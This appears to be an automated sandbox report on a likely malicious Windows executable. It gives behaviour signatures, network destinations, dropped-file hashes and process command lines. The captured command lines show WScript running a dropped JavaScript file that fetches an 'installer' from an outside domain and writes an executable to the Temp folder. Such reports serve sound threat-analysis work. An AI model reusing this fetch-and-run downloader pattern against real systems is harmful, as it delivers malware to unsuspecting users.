Analysis Overview
SHA256
dde813f3141583c296153f77d4f395b1e99cd9cdad115da3c56ba9a79831bb53
Threat Level: Likely malicious
The file a6d586ca114fc8475d6393d91407bbb8_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Unsigned PE
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-13 22:14
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 22:14
Reported
2024-06-13 22:16
Platform
win7-20240221-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a6d586ca114fc8475d6393d91407bbb8_JaffaCakes118.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a6d586ca114fc8475d6393d91407bbb8_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a6d586ca114fc8475d6393d91407bbb8_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf23B6.js" http://www.djapp.info/?domain=YkNFHqtOed.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf23B6.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf23B6.js" http://www.djapp.info/?domain=YkNFHqtOed.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf23B6.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf23B6.js" http://www.djapp.info/?domain=YkNFHqtOed.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf23B6.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf23B6.js" http://www.djapp.info/?domain=YkNFHqtOed.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf23B6.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf23B6.js" http://www.djapp.info/?domain=YkNFHqtOed.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf23B6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 280
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf23B6.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm
| MD5 | 974acf61b936ee1d95a57f90547bd018 |
| SHA1 | 943d5b9fc55b2461302d240603df47812f40e967 |
| SHA256 | 195e7d6c78adfeab44dfaf7a07773363249ae9e9e30ad4aad583ed2a6f79123b |
| SHA512 | d82165991ef79d99372d4079fb0a1b05b7697f9c58ab5781996af7632b3f69005309aae587c8e714995b0e62c37bb18f14c25aae2132c338d3c670167183b0d0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\BY6HSE3H.txt
| MD5 | f680957c7ab96c1d0fc2bc8a7b859a4f |
| SHA1 | a782a5b758d43a4839f15716a4c92185a5f5d6df |
| SHA256 | 35f7e155f5990584a03f234fc50d6b944636c0f97357b839d361ca7c615edff6 |
| SHA512 | 23e01def18ac73e25b0d1550d7c71ffca9ef68b0b9d43021d3f15b3a8152e15cfb8f5ea55d9e5933ddc8338f8a7f88addc98f3bf5bd93227c8a00d2a9c904e55 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2aa51a40c14cbaa2f3822a3ae8d7d9cf |
| SHA1 | eabee583a716cbd5ee95e2a2e5645d8a441206b6 |
| SHA256 | 307995086b76541e1a9f42327dab4128f5291754c5aa8b0a6dd05c4337cd3ab4 |
| SHA512 | 4c4711225a260513bd6167087fd09ba956882b94182feb3555d7d9dd0677cbc6e623387e6544850122387cb484948e7a52f4fb5dd9ace5296b9578844bd43a19 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | b7e301c526085b92d1ee104e49c43fcd |
| SHA1 | 1355fe052eabe2d7a2c6a76aaf01aeefe975de03 |
| SHA256 | 54275a5e8571885413996efd0f1c8db152f61e86570bf480512874b14fca9de7 |
| SHA512 | a92b8bad47f3f6ccba671cad68256c3ae89c897cf3f1cef12419efbc1a3a8b31577291511c3f4a48bb41e2a32ece9641807dac71d11627ea989e85a33916de3f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | a08991b3b3149042115bebb75a76ccc0 |
| SHA1 | 4f1a11c57b43422713fcb9c7af450a3a547ad11d |
| SHA256 | 827224a17beecdd911e49e0f09ab9665246f781744d1241545d6aefe2e67c788 |
| SHA512 | dc3f8319b0a7ab3e3a37447cdd60b3772bbb5e73cd44e9e58c2ad979dcd68f48f675c8a0a2626e9d3af5d4c664a9dcc52b786b69946236d8f89d12371d987fac |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 7d83afc7feeaa3b697a7ad737004c57a |
| SHA1 | b1947edcd59c11b811b26e6c779de788ce5bdc28 |
| SHA256 | 799cb0482aad6f62ee0e7afc267f2c6d69905ad556fb9b4bd192f6f681cb6070 |
| SHA512 | 94c3e59897a809f3f26d57ef3573a939495e34b742d1eef2c07bb304af2a2070ba8c425fcb8f370236f068237dca09935d277d5bc0948677228dea3b67e89994 |
C:\Users\Admin\AppData\Local\Temp\CabE724.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm
| MD5 | a94b0d07727ffe3e110cfcf7bc2215c7 |
| SHA1 | dc79916a73d4094978da6bed226b6780b4d1a091 |
| SHA256 | 4acf00c949d7403df64b5365710cd467bc56b32c00e9bfd87cc6d13784a5bf81 |
| SHA512 | 1bfd31e5c981929608fd64fef60e0a0ebcc9822c8942f1a19399800534ba3fce0fdd77e0c635afe1a23b0c1b79e4978e65cf24aaabc9eae24ae089d185005879 |
C:\Users\Admin\AppData\Local\Temp\TarFDEF.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm
| MD5 | 05e7047e36c6bec8b8201902f55eb1bd |
| SHA1 | f0529813ed5ff8b223daa224421907fac7dbe652 |
| SHA256 | 5df0c0d8b1437910b4455c2814d8c2c3bb3d40d7102cfa4bcaabde36458b46b7 |
| SHA512 | 667f7ec2ebd977633372db4710392f18f14b16d423eda90fc6f83b6e94d64f8705d252d1884d99a477e70fc8b5d879993919daf5cfef67f5ea76452d1c968200 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 22:14
Reported
2024-06-13 22:16
Platform
win10v2004-20240508-en
Max time kernel
100s
Max time network
90s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a6d586ca114fc8475d6393d91407bbb8_JaffaCakes118.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a6d586ca114fc8475d6393d91407bbb8_JaffaCakes118.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a6d586ca114fc8475d6393d91407bbb8_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a6d586ca114fc8475d6393d91407bbb8_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a6d586ca114fc8475d6393d91407bbb8_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf44F8.js" http://www.djapp.info/?domain=YkNFHqtOed.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf44F8.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf44F8.js" http://www.djapp.info/?domain=YkNFHqtOed.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf44F8.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf44F8.js" http://www.djapp.info/?domain=YkNFHqtOed.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf44F8.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf44F8.js" http://www.djapp.info/?domain=YkNFHqtOed.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf44F8.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf44F8.js" http://www.djapp.info/?domain=YkNFHqtOed.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf44F8.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 1396 -ip 1396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1456
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf44F8.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |